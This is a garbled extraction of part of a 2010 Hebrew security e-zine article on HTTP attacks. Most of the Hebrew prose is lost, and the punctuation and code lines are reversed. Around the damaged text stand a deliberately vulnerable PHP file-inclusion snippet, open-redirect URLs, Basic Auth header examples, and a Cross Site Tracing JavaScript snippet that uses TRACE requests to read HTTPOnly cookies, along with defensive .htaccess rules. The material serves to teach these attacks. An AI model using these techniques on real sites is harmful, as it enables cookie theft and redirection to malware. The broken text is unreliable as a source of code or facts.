;)'$file = file_get_contents('accounts/'.$_GET['user-id'].'.txt
$file = str_replace("\r",'',$file); //
;)$memberInfo= explode("\n",$file
}
, Local File Inclusion- .user-id

, . ,
.
, . ,
, .
,:
HTTP Response Splitting
HTTP Response Splitting cp77fk4r
.DigitalWhisper .
.
File Download Injection
File Download Injection - -
.
( PHP ) . .DigitalWhisper
DigitalWhisper - .
Open Redirection
( )Open Redirection ( ),
,
. :
http://my-awesome-site.com/move.php?to=main.php
:
HTTP/1.1 302 Found
Date: Sun, 11 Apr 2010 20:39:48 GMT
)(Hyp3rInj3cT10n
,8 2010
60
Location: main.php
Content-Length: 0
:
Location: main.php
? :
http://my-awesome-site.com/move.php?to=http://google.co.il
, , .
.
? : ( Nvidia , ) .
Open Redirection . .
:
http://nvidia-site.com/download.php?driver=DriverName.exe
, : DriverName.exe / /
' .
, , , !
" : nvidia - , !" - .
. ,
... ?Nvidia! ,
.
Cross Site Tracing

HTTPOnly-
( XSS )Cross Site Scripting : .
. , ,
.
, ( Microsoft )2002
.HTTPOnly ,
)(Hyp3rInj3cT10n
,8 2010
61
. , ,
Javascript- .
:
>"<script type="text/javascript
;"document.cookie = "side_menu=1
;"document.cookie = "id=123; HTTPOnly
;"document.cookie = "password_hash=e1245f16d; HTTPOnly
;)alert(document.cookie
></script
document.cookie- .Javascript
:
;"document.cookie = "side_menu=1
side_menu ,1
. ,Javascript
.
, :
;"document.cookie = "id=123; HTTPOnly
;"document.cookie = "password_hash=e1245f16d; HTTPOnly
HTTPOnly , .
( Session
).
,Javascript- alert:
;)alert(document.cookie
, ,alert :
side_menu=1
, HTTPOnly- ,Javascript
. .
.HTTPOnly ,HTTPOnly
. , !
)(Hyp3rInj3cT10n
,8 2010
62
Authorization

. ? ,HTTPOnly
,Javascript .
.Authorization
, .
htaccess - .htpasswd-
- HTAccess- cp77fk4r
.DigitalWhisper
, . ,
.
, ,PHP- :
<?php
]'$user = (isset($_SERVER['PHP_AUTH_USER']) && $_SERVER['PHP_AUTH_USER
;)'== 'roy
== ]'$pass = (isset($_SERVER['PHP_AUTH_PW']) && $_SERVER['PHP_AUTH_PW
;)''777
) if ( !$user || !$pass
{
;)'"header('WWW-Authenticate: Basic realm="Please Identify
;)'header('HTTP/1.0 401 Unauthorized
;)'die('Access Denied
}
>?
You have identified. This is my site... bla bla bla
:
HTTP/1.0 401 Unauthorized
Date: ...
Server: ...
"WWW-Authenticate: Basic realm="Please Identify-0
, Authorization:
==Authorization: Basic Og
)(Hyp3rInj3cT10n
,8 2010
63
( ) :
==Authorization: Basic cm95Ojc3Nw
: .HTTPOnly-
HTTPOnly- TRACE
Cross Site Scripting
,?
,TRACE . ,
, .
HTTPOnly - TRACE - ?
,TRACE .
, :
Host: 127.0.0.1
:
HTTP/1.1 200 OK
Date: Fri, 02 Apr 2010 11:41:20 GMT
Host: 127.0.0.1
, Cookie .:
Host: 127.0.0.1
Cookie: id=123&password_hash=e1245f16d
:
HTTP/1.1 200 OK
Date: Fri, 02 Apr 2010 11:41:20 GMT
)(Hyp3rInj3cT10n
,8 2010
64
Host: 127.0.0.1
Cookie: id=123&password_hash=e1245f16d
( : , )
>"<script type="text/javascript
if (window.XMLHttpRequest) //IE7+,FF,Chrome,Opera,Safari
;)(var xmlhttp = new XMLHttpRequest
else //IE5,IE6
;)"var xmlhttp = new ActiveXObject("Microsoft.XMLHTTP
)(xmlhttp.onreadystatechange = function
{
) if ( xmlhttp.readyState == 4 && xmlhttp.status == 200
;)alert(xmlhttp.responseText
}
;)xmlhttp.open("TRACE","http://site.com",true
;)(xmlhttp.send
></script
: Flash, Java, Visual Basic Script, Ajax...
TRACE , ( ) .
XSS .
,Alert ,
, ( User-Agent )IP
. ,
.TRACE ,X () TRACE Y
.Y .Cross Domain
: TRACE
TRACE- htaccess ( : )ModRewrite-
RewriteEngine ON
RewriteCond %{REQUEST_METHOD} ^TRACE
]RewriteRule .* [F
,Limit-:
)(Hyp3rInj3cT10n
,8 2010
65
><Limit TRACE
order deny,allow
deny from all
></Limit
Same Origin Policy

Cross Site Tracing ( SOP
)Same Origin Policy .
, Javascript- , -
, (
) . , Cross Site Tracing
Cross Domain Javascript - TRACE
, , Same Origin
.Policy ,
, .
- ?

.HTTP-
Header
, " :
".
, ,
.
.
HTTP
HTTP - , ,SQL Injection
,HTTP HTTP -
HTTP -
.

( :)cp77fk4r
, ( )
( .DigitalWhisper )
() ... , ):
)(Hyp3rInj3cT10n
,8 2010
66

.Digital Whisper
- . , , ,
. 2 - ,
.
, , ( - 37 -
) .
Digital Whisper !
" " ,
, editor@digitalwhisper.co.il
, , :
.2010
,
,
30.04.2010

,8 2010
67

Digital Whisper 8

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Digital Whisper 8

Uploaded by

Copyright:

Available Formats

Digital Whisper

Digital Whisper . Digital Whisper

3G MOBILE NETWORK SECURITY

PLAYING WITH HTTP

3G Mobile Network Security

3G Mobile Network Security

3G Mobile Network Security

3G Mobile Network Security

3G Mobile Network Security

3G Mobile Network Security

obj .lib lib

,real mode -8086 ,1mb 16.

: 512KB Block( .16B Paragraph-)

B8 XX XX .mov ax,XXXX XXXX (.)immediate value

Playing With HTTP

Playing With HTTP

* :Host ( Host- )IP

- Mozilla Firefox , .Mozilla ,

Last-Modified: Mon, 12 Oct 2009 18:50:22 GMT

X-PHP-Load: 0.8916015625, 0.9599609375, 0.97265625

Cross Site Scripting

><input type="text" ... value="" maxlength="10" /

Cross Site Tracing

Same Origin Policy

You might also like